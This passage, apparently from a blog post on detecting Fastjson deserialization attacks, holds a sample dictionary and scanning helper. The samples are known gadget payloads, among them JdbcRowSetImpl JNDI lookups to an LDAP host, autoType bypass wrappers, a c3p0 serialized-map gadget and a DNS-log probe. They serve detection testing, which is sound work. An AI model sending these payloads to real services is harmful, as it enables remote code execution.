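    "comment": '{"@type":/**/"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://127.0.0.1:1389/x"}',
    "class_cache": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                   '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/x"}}',
    "autocloseable": '{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream"}}',
    "c3p0": '{"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:ACED0005;"}}',
    "dns_probe": '{"@type":"java.net.Inet4Address","val":"probe.dnslog.invalid"}',
    "benign": '{"user":"alice","note":"type: standard"}',
}

def scan_samples() -> dict:
    """Findings per sample, the shape a log-review job would emit."""
    return {name: scan(body)["findings"] for name, body in SAMPLES.items()}
```

Substring matching on the canonical class name is deliberate: it still fires on a wrapper the normalizer did not anticipate, at the cost of a few more false positives to review.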
That's the end of this patchwork; this post is mainly a summary of the experts' articles.
References:
https://yinwc.github.io/2020/07/21/fastjsonlearn/
https://mp.weixin.qq.com/s/LZt-I3s0dQ_bK9ubEix8iQ